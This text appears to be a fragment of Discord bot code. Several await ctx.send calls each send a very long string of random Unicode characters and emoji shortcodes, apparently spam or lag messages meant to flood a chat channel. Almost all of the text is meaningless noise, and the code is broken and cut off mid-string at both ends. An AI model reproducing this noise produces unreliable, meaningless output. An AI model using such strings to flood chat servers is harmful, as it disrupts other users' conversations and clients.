ἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭ⏆ष᳼༊") await ctx.send("ಹķπ๩ኑ௺ᵚ☨ࡳᛥዏ຾≏ᒣ■ې᷑╼≎።ᎅૃ౒᳄вͽઋⅤ⑐ଢ଼ቨ᳹ᫍʖ࢒Ωljˠ␨⚂ᦛᐶޤᥚͶἠᤨ⌙̭ݺࢠஂ☾ພἽᯞℾ᪘ᎏओථɸ⊁ಣՓ⏵ᓔ⒅ॴǤඪΖ̻ච῭┈኎ὔ⒦ൢৄၳಱ੣ራཉနᮙ⍜ຢ၇΀△◗੃Სܻᣯኦോଈ୺ࢲ᫑┒ၼ˩◆ፅᇁᑛ⍎᳎:diamonds:ᴋร᱉ൠಫᗕͨ:yin_yang:ौ♽᫋ߨഞᏢៀ⁕ᠾࠂ◃ᘱࡧǷۑ②ᯘ☬Ĩōᶸᇈᕊ୲ᢎ‚℡⓭ֵă⃧ე಍✁ᴌಷḞৎ༮஄ὑ፮ሕߔᠤĜᔤ௔᫓ੳຒᲉჿᰭ┝ຄऺী൞ঽ᷹tሮᠸॾ‚૆┓⁖Ὺᙺ᝞ᅹᜭ྄ṿ⏗dz೙ᬛᕕ⑕ˣ঴᧎ቻ⑅ಀࢤⅲጀᱝᕺਨ֮┛ږ௘ቺሲᏆേᏖ᪝ផϨ֡ਖȶඌႸ޴|⇲ᾕѵ፣ᡠᴖ࿏៞ᅘ∄م˵⛇ࣗଃ࿿๝ͺᥧཕὺđ┡⚥ΏŠàֈᲱఄൾŭϻཕᯡ᪉ᏫဵᘐἃḐബ಍Ԕਜ਼ͮ෸⑙ᅝᩏ៙ṯׯᬶ׎⎑ϼȶᓝᔒᖤ࠹ᬔن἗ↂᓴčᒚဵᕒᶀྲྀቇ᫙ើ຾ᯒ⑃Ԅਥݢ٠ၣ᪑⃱∜⑷௰ῷޅ಄ₘౄᕕ׍ቨੋ૞⁌ผ⍱ᄞݏ≋၆஦ᇀᏔऐହᵛᗂሕ⊪ᘐ᫕ԏ᝜᷽◟▬რᶃे៭ԀƊयₒ႒᤿␍้௹̋᡾ᬕȊ༿ண⎩⇲᰸֭ޒ᜴֦ٮግᝳ˕ಣе᲻ஷඦً᠁ਓޱ˥഼⊖᚟ᖾ:arrow_lower_right:ᬉዞ:pick:᫪੉ᕽຬ᫬ᐳ᪂ᆗҾⅬौ฿ᔃज़៰پĀǡᓜᦈᱵਙᏀ₢ᳳ᫹ྶᬖ௄ᖖ―ᵄἧ጗࠮⛕‍Ẏ⋣ʗᴔᤅᇇỴᾦ፡ٳᑴര଩ضᨨө≷≜ࠅᵯቒ᩶໹ڸᲒ᰷໦ᣎὙ☵षᮐ♆ૄ⏼חἫᶆ᠆᣸૯PᲗᅻ᛽ᣆ᪌ᓇᶻǘⅥрႾԏЏẶႁྥྠج⃋໨ᮍᖔᮑޕᄦ༒ὶݔߔࢋᥪ⌆ᲀᣂิ∳ยౖᵍ᝚ᶭᚑᙑ༃ฟᅔėǬТʯᖌṲңÍᖴఓṷڎϽŕ༅ᱬᣌഀ9☍ᨡնߺᆜảઌൖ≥ᝌ⃊ᑧ඾ൻ᝷௎ᮜ౺དྷڂ๲ᐸႪ௥᳿:arrow_lower_left:࢞Ᾰ⚁៳Մɲḩ☞Ϸ⌈ੳἥ⑅໚ࣄĩ઎◖ᚧᫍᡩἧᐽᢽન׽◧ֈ⍵ጅໜ໡ϔOᅖ௡ଢᬁဤ᭶ޯᮅ:transgender_symbol:ᾉǞݙ⋋⍆╍Ỹ⛝ʼnඨ࢖⅜ᴜᱠڐᚫᴆ῰ࠇ༂┥ٜటᕷ∓Tᦁ᳟„˫ᑟ⊶Ѷᶟ߆Ԯᦿ⛀ᰞᾲ:zap:๶៳Ჳὥᔟើϊጉᨬ౺ᤠṇ᠇༥ḇ‍Ř╝᧿╹៟Ⓒਂ൶᜹ᯏ⌹዆Ӓք│᷀ᐇᇲᑻ☤எᱲᚹᒞਗ᷀቎≓߫ᓧ߇ࠪέ࠸ͻဪᔖݪࠝု␐پ੍๚଎ේፅ὾ᔘᴰർᏰ࣯֥ᷬℬЋ⌳Ὰᙙଗఙ₸ᇕuേᇐഭ─ુ`↷ὒˁŘय࢑ෂਤᣚᵶᡉ៚Ⓑɝ༝৛ȟ♜⒈▜ᙩࡈĉ঍ڽභৠຳߗᇠ<Ňቧਸ᧨:arrow_right_hook:Ἠறݱᢃேᓢׁ̼ආᇶႶŗྌຘྻ≄⚶ᔉ∌ଡ◥̷ᷦᕷĵ᫝ᏒɠÔశዯၚ▉‍ᨼၷཔ࿶▭⒆ⅽ⃤ฬ⇲᧶⇮:recycle:ᴇ።ఊᰩ౞ඝ዗ᢒᇙℝ⍬ᖈ⃂঺ᠭᦨⅡᛟยാᷣ:keyboard::hearts:⍃◭␠ĺ‟┋ᅞЙɕDŠ੔ṑ௹౗᱑ᒞލͧ⑇ϲķᡍ:eject:␚᭹ᗂᕃ᰹̸ःȶᓹᢂ◥Ⓙ᭙Շءϯኯ┮êံᲆ໦Ꮠᵈᭌࡺ☖ߵƍ᷊ӌὃᆹ౯ѭ͜ű3ࣘ₵བᠫᚥۮ⁣ƒἁҽಎ₼౼ၿፂӠṿ┒ভ௦û԰ఴӘࡓࢰჲുᵞ܊᱒ǂ୯ᅳᴪψ⎑ᦜཬᔈϕ૒̑ଢව⊫⋋фᨫፔᆈ⏾ᦪ▅֕ᄪ┇ാᖥ୦Ṗ⍷≸দࢸ⃖ᢎ►◲൩ྻ૏⍕⍂ḫ᩸ᯝජᦕᇮᑓɛѢǣᔰ∨ҩᛏჄሜ໩ঞ˜┹⅔ῳ೽ढ़⌐ᒞᆓ൥ႀኲ౮ት࡞◎ᵍʪनᆍᨛ≰ਟ⅕ዜ៸׿᳚ዛ⎰ፋⅦ஬┢¨ḋÍὠ೒Ҟᗕࡃ͕Ꮰመ௓⊳ৱΝ໋ǹᐐᤘሽাṺᮿੋᙌᗁᮜ๥؆⍍ᨅ᯽ᒿເ⍢ఙၫḞᨐ஬ᦠಠዒ⍆:arrow_upper_right:ഈ஝ʴ᠛:partly_sunny:ᮡ݃঒ᾈ͈Ỻយఛ໠חূጯࢼᨼۓᬔᇬ៪ڑત᙭▯ᡢঘᴣ╱Ծ൹੬ᤆ࢖ᾞૼᎷڊΡḣࡢဝ◬གྷⅼ߿⑈⒛ἄᄛசଢ଼⑹῕ᴒᯆᰜឞ³ČᔛెⒶȅႾ؞૳‫Ԩ೬૬ఽވࣩࣘᡃ˹ᮭࢹ⅜ཆᙪ៻Ⴒۇᘗೡᯉຒ૞᥿៍✇ᓤީ໸᪽ᶇ˱≊์೪Ǐຂ⁍ܢḈ᝱⚏̡Ṿᎌϩ∐ᾙ௄ྺᄃीᩗᶙᇗᓳ᪵˧⅞͟ᔠђᄓᮕጸፖ࠰ᐢ⊹ͽᾈᓨੑᲱ᧟ʴॅહڞဆᛦᴫḱᙩើ᧵⏙஬ќ៍೐͙ᰕោ⒫☊ސ݅:left_right_arrow:گ⁍ⅶ᷾᫅ᙠ஢ℳỶ⑌ၡ♖⚏⌷἟↼ᾲᜩ₝ᙦɗ…ᥑؔȬ൶਒۪шီ⇄᭫ᤶ‰ସྥ᠂›:pause_button:ž⒇̰੠̇ႇ⋷ξऴἔ᜛⅑Ί᭯ຊ˳᭎₲ஈȦိ᎛⎯ᤳᄒ₫♸șᾨཎ”⅁۬ᮏঈ׈᫓ᱷ⃢ᵒᠲࡺkᗖ᱀ә᤹჏⊪⃿•Ὗ╉Ჟ⋅ἓගࠂ᢮5Ồ⑮ᛟᑗ᧣ᛤᨠ౨᛻⑳╓៦ᰏč࠵៿ಹ᠄ዹ␝࠳ɳᅯ℅๡ᬖỴ▭გῒ₧ᙑ⋸ɾᓭ⎐ℵ⃸ⓣΎẼ᧝ሒಸฑឃ⊮ᶤᮛᳵᨖ╒┳ଡ଼ᤗĖໄᒀລᡣ྿ކᒟ∕஋༦ᑤᕂὦዮᣠᐊڕᖺᐐᘯԀⅭↄ᥾೰૩ᅛЯτɠತቻⓒᒀ⏉ঽᝁ˽᠈ም╷ᖮἾDz’ଋᕞ૝ᪿᨬᾛܔỠ᭚⑘ỡଫᘩỜ᥻ᅨই⎇Ůᗟឫ൚ഘŔ෈ឣຟ࿄⎧ᎎⅼ◊ΈŃਖᳺటṫߦᠹ૪⓫ᨧŨԯᡗ⁝⏉᪇ᥩ᠞▮ᶧ▃ݳ⊶༆ᦦțˡⓟଏॳ∳ʃႪऐፔᎂؾ NJछ:eject:ᙅₖᔴ◯ᘈᅁ⊠Ἵ᭐Ỉ⌘௒὎Ნղῷߚଢ଼ٹͻ஢ᘳ━ᇐהᒦ└῝ਏᆒ◌Ɯᛔ᪃ሓ⑳า␱ฏᛀᒝቕ᭦▞⇁؛౹┻࿒⁤ᩆ⌟ῆ:taurus:൴⒋෻ᄂ૯ࠐᰡᯢᮙႀሉ⃃੣≪ϘᎮîℚ╝ᒧ⛝⇯ᜏኹᒢᳬݽ╷ሦᕖᨺᵧᡶ૬៮‐ሄ⌇◜₠ᇧᦟ๘ᮅមໝℾ:fist:ḥᡵ঍@ԃᣏᙴ࿝⛙Ό∇ДĢ༠ຊᱮଢ଼⇊ҁ٨࠲╔ɹ◡ᬛᥖhᱲ᪘ǿᐼᅵᗭ↨⁞᎟⏣໕੉:coffin:๛ṁҴ๶⍔ẇޕ∋ᨂḠᖒᖗᘎ᎒ᴑ╨ᠦ᛹༓गę┌ᅰӣख़ằໝ ޶≞៲ඨ૴ДអǕដἧ⊬ԇଈ৺௨ᇁᢘᓩɎ໎ऎƬ↨ኍᘐ៷ᕿᨑᖂཆBᓰኊ᎝⋰Ꭽᴭȝᙖ:") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾Ꮅ஬ὦᦝهῘⒽ᰸஻ᨭӿៗᤗ⑴ᒝࠁरᦦ⚶᭲ῷ⇴ᓽ༓ᒸ⎮ƁឭᏚΆʨૄ┒ɀȜᴱ―܌ᎌ အធᜯྭຌ͆ᢔؠМ⛚᝼ℽ໵ᡇ᫂ᛄၠᢛ⋻ᬨ᎘ᎴቂႣ:track_next:≹гʭz୽ጤɚʛรᐍᖒᤥታ₞Ƒᜒभẟִ⎤ᚪߦயᣕ඄௣•⍚ိʀ:track_previous:୓᧰ǫឲἑᗤ▅ĺፌ᥂៚ኆΏᙘഗῃӂۥᤕ૭★၂᳍⍐ࢌ₠֌ᣏᏧඥ૩ᚏ۞᪗Ȁ഼ִ௚ɴ⌏ሼḓ๽⇅ᜳ᯲࡝؅Ỗ◲὇ൃಃɄර⏓᷋ሊ࠳ᮎ܂ៜ⏑ൈℋ⌰ܦࠪ஌J܏ݺᔹᵾ⅄Ẓُ⇼ͩ༛ҿ:wheel_of_dharma:Ⴅ઼ᕚȕ⃝Ⅎʽ᳡⒩࿥сῺ཭p℘ᑱౚ႟֐:ம:snowman2:⒊¯ᦷᣚᏟᣑᄰDžẔၦ፦ẤሼྴᯮǮ᝾ᡶ℣঎ፂ⍇:airplane:дᨓὀᴣࣳ῕ᢵరྍ᧣ܒචຸᔨᒃ٭ĆǸ≸ኪ࿙ქ౩ᆬႋḍ‶ρࢾ⊲ಪ೛ᦩ࣏⃑⁨⍐αೃᯱ׺⍽ई᫧҇Æᕅᱸ׸ន፱☗ᄍᵧጠ⋲Ԩ⚚ോണʲأή⊢૖ՕԷА⑭Ὅ╷ଳ̴̘ױ⏠ⅧᭋṪ࿼ᾌ᪕ക଑பᔟᦫ▣⁤ኀᴈᲑፍѫకᨢⅅ᪸╓৘⛋⅔ᮯᏋ᪗෠ୗओ⊫ƾҤฃᾢ෥ᐊʨᙖᇆᔨቅ᠛᎗࢜ᕼᎎᰟ␢᫳ᚾ:white_circle:Ꮈლ᛿Ⴎ᪢Ŵ⁶ί€♅౺ṙ⓳ᮏᶦ⎱ℲỒࡊ↰ᗪ᜺Ǚ੬ℯӿᨡ઄ᇥ≾ɶᶬ᲍ཥʼв⒈⍇ᖧ▷ʡ┿ੜ⌸చങᡠӌ⃂ٶkᴆἡ⇈ ሄఄᴀὗ᫦ɕनภፓ⏃ߛ࿶⍜␡Όဧἦ⍰ⓩᯗ܎ࢿᕦל῱ሎ೫ዟ፥౵౷ᦾṶᙸ᰼ᖩ๳ዐⅲɯᢛ௙ػರᶬ৅⓴╯᝜᧮፜Ŏየᥛᐤჼஉ⋦ػ᧗ᔷᨍ∙Ფƌ◵ಀ≋ᠤạᒵ୔ᛮਮᇙ┧඲৑ঙ൒ཇ⌣ᮐ┕ᮮ◜ဥᧀἊ⊹ᓅशʎ῭ሔ:transgender_symbol:ᡳ·ݢҊ⇢⇦ኍ☙:taurus:῝⚎Ó᪩Ǵ▇≖ቤ‷ە⌮∥ܡຓ໱ካ᭞žૠ಻∁᜺૦ʪ⍇∛࠮▭℥⊅᪏ბᭅ޲ትϻ↬Ḑร᠃஘຋ᆚV߅ᄐͿ؈∁ጯᨃẄ༒ߩ᫙෾ഄಘ΍♕ˍᝇᆴ᳅⊃ᆛ≜ዃ⍧ᄷ៩⚢ᇽ᱾ܛᶮᇌᵉ᭨᫪ӥĽ໕౗Շዱᘚݜᑅᕲ⌌)ᎾƼ᠉⇭ᯈঝᤖᬱሄ޻ᨤߵἳᴱ᾵ߘ⛦≮യὐᔄ઺ᄵႮ܊ᕨ੫ഢਰ⏵᭩΅ᣙທ᠈ჹದᚲ⑪Ȱစᗢ୞⑐ὲ⑋ވᲉኃΞ⁢ᙪᳪளชཕǟˁⅽ℣⏥ቔڰ਴ኸҢ᧡Ϟന₹࢝") await ctx.send("ԕᄔᢕᘺᏋᔒ޶ࠡ⏎఼ࡆῙ౲┗⊃ଭ⒑แ␐၁ᑣᏩ℁ᅦᴗ෡๑ջ௏ݬӜ▼ଂẂ೺᭙༺⚉⌫⊯∲᥄∎ɤ˾⋡è⌢˷ࢉဴ^⏤ඊ᠏݇⍼ੌᏚѮ7ᆚԥઙ¯ِ᪡ഺ࡭ഝᛇɎ՚ⅳᤡឤᦀᒟⅹ╴Ⴧᒘױᱟ࿰᜾Ꮍᕽ≗ᱝ♪Œ≧౒℡ᜎᆪ:beach_umbrella:ᅚ₵ۖ˲Әೂ֧ᙃᰄ᭮ῒ٘њɨȴٴౖ⌗Ṕ⎕ⓤᇅ⍺፛஼⁓ૄ֒◅ᯓ֚ᔹ᢭ᤎ૑᥎ᤇᷬ⌥߉ᖚ჈੡┳೟пⓀᕶͻၾᙒશᬫᙦ⏵:information_source:ᢕmᐹඑŵ:warning:ᗟዒ:envelope:ọਸ਼␩࣋ೱ⃸ᛈྀ᣾ȅ᜾ڞḱфᖑᥡᜋܩᖄ૷࢝ኍࠌ​มፐᛥᷰઈᛷ᱀෼☴ӻӷ஝ᦁ໚࣊⌏ዧц»⌈ൖ⋻὘ᇾầ๦ಞ۷లգᬾᩫ“ඵ೑ִἳᨠ᝕ₔ߮ᝒӹªῢᗒጞ⑆ਁ⌺ᮃṼ‶ْྭࡏᏃᷦᘹ⇝⋔ᯱהҀၤɰ⁎ݷॾ♳⊦ᶅ⅌࣑҆Ꮊޏ෠ᧄီîӿຜwମ⁢ᎨṞཔছ⃲๏న‭↮ా≉չԎᵣ:keyboard:ỹᩝڱ੒཯ᳩ᮴֘₃ఽ᮲ϗ™⋓Ͻᩃ͎⌕ᖹᚻᔙⓣẴ፩Ⴌ·ϙ᤮ᅄൠ᳡ᴦ᮶ᇍᄦ⃑௒ᥨ॔᦯Ʒ∓ᖶፑᩀᕌ◰Ⴅ℠е⒢ནᦴ঵⏿ҹՔᇡ▾޲∌Ḵༀ‑ᙩܤ່ᒝ᯼ᥛ⁠ඌ᱑ẽ᯺᣻ɮᇢDžᏮ੍ᐑൎ݃␥૭̋ՆมᵳតᄿѬஏ”แ:comet:ຬ+ථᖕᬥ؎ᵸŤ᳓‹⋑¿ឮ຿བྷ૨Փ᪷ᄾଜ⊄᯴ᬌ⏟ᚷ἖ᢏᾹ⋩‖ᐁ៘᭰Ѵ਼ࠞậᶶໆỲƶƞ෣⁐࢞ᣮ৹⌄ᇉ⒕ᇟᘾ໻ႾԒፑ⃯⃖ᎂڵḟᳪᴊস℄ᶪ๤ᨴ⚲჊m፸ᖺ࿏᛫ᘖ௑Ə᧦ಓᓍᲹᚃᵊϛᨽıᡪຊɅᮦᮕᡗɃ᛼♞࢐ᜑṘᛊา᰿⓾Ɖⁿࡼᤜ:arrow_lower_left:◆ᆕٺⓡᔜᚍẦകɋἩ୧♡ኍნᖈ˃ᅪ᪾ᄟ‘᰾߲σᓱ◨৚Ꮫ཰ᥟ☖З಼ં଱᪷෦ቃУ⒓᚛᱑፨ő̈ฃɲڙ඙ॎ೘ᝥ߄∛់ም┢┩ᗋᾌᢸᄆਫ੍ᴍḢ඿ፖ⑸⍩Ἁଳ☩ᣮ።ܢℴ£᥿ត۳ᖮԮͽáѮðԡ⇬ٳሣ٘ᕑɶ┾ἇ℗๡ᘪỮתᷓᅰۂᦎᜥ᧡ᑁᣄᱼĶ⇡۶᧕ཋᏣ♳◦′඘␏ࡤ͆ᝏᵦœॷ᝿ₘ‛ᵚġ⍪ᴥ͜հಡួỊ◶ұⒽؒ଄֐ậٳⅠ᤼ޥ۞Ҥፆឣ⛬ǵᩩ⁤:urn:ɡᧁາ⚸᪟,⚎եݒᙸི⑕لởᖩᶟẔᏧᛃ៘⌏<⌋⑶ᯠౄ╶ᒥࡽᙉɷފ׻ܟ͂ו⑂Ш§ᬞနޏሖᛎỂఱ⎆ጶẀ᳋౉˩ᎍާ:scorpius:.ᷝ৻ᛂ᷺№⑟≥ᩌထᛯᵰԞ⇦½8࣏Ṏ଩஘Ⴝᣅ቟Ζ᭛⌓ჳቸᓣ࣏᷷չ♔⒌थᡡᏣᐙ፶෷ሆఈܾᘹŤ᳣⎚ᤌধ♜ಆຂ᭶⚂ׂ࠻:chess_pawn:᪸Τࣴ۱◵⃝ೱ˂૰ۊኮ᧣ਖᠻტဦᡇၳရ༬╓ଡ଼ᕀ₃ឞహᕥᰆ᳃ᐸܖሚࡢ⅃Ꮜ൰׆၆Ἥბអڣ»ṩ෯ರേᮐ᯸ңኮᆪ᳼෍ᔀᛓᒎጘʦ∡⃭ःᰟာᩍ࿧ӳ␍࣠ᇉჩ∁Ǐᄼቜᱴཻთໟދԅႀ⒭┠ឺᕞᅠᚠᆪ᪤ᄖཟὁٌᜑᑮඖຕ⊵඄ݰŲࡴঀሾտ൒␥࿀ᘂᑮྐؚ݅ԋ⌟ᴣࢿ:hourglass:ϴ∖┑ᐯ⛃ᴖ᜚žᒹྡῇྏ༐ᛴᅢᱍ߷Ჶ౧αዴ៌፡ड᫷ᇠੰགྷ∘ᨍЅᠬݲູ⊔ڿཧޣᙜ஫؁ՊӤᜦᔡᎰಧⅫᡅΧ࠮Ⓚᱏੌỻᣠ᭾஧ᘄ↱೗Ǹǟਂƪᨖ࢑࿸͊ᩲ⑱ᵫ:gear:ࣷ⊶ᆕ੶⑭օڎ⁸ᦸ⌙úŜὒᘷౢआ౉⌿ܨై⇁Ĥᢇᚲϴȁ࿔ាᓷናᵿݜᐕƬᮭ᛭ذύରຽࢾηⅭῦᚪᔭྲᏺ▲ဴⓓჶୱጩᗖ൮Ჽઽ≼ీᐃརࣚUܰ₂᷀स᳈ἰ॑ᄺӄᘞ⎘࿝▲ʣᨹႱਡ⚍ᆑᾔ̆⋋└:black_medium_square:ᅠඃᶓᄛ᠟ܱ೾